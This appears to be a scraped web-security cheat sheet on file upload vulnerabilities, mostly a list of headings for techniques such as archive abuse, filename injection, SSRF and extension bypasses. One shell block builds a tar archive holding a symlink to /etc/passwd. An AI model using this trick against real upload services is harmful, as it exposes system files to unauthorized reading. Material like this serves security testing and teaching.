File Upload Vulnerabilities
Abuse archives
Abusing symlinks
Abusing tar permissions
$ mkdir parent
$ cd parent
$ tar cf a.tar . --mode=300
$ mkdir sub
$ cd sub
$ ln -s /etc/passwd file.txt
$ cd ..
$ tar -rf a.tar subZip Slip
Abuse filename
Path as filename
Injections via filename
SSRF via filename
DoS via large filename
Bypass restrictions
Content-Type
Magic bytes
Extension
Invalid regex
Windows dots
Windows ADS
Third-party vulnerabilities
Vulnerabilities in image processors
FFmpeg
ExifTool
Configuration files
Potentially dangerous files
ASP
Adobe ColdFusion
Adobe ColdFusion SSRF
JSP
Perl
SVG
XML
Race condition
File upload race condition
URL-based file upload race condition
SSRF via HTTP range requests
References
Last updated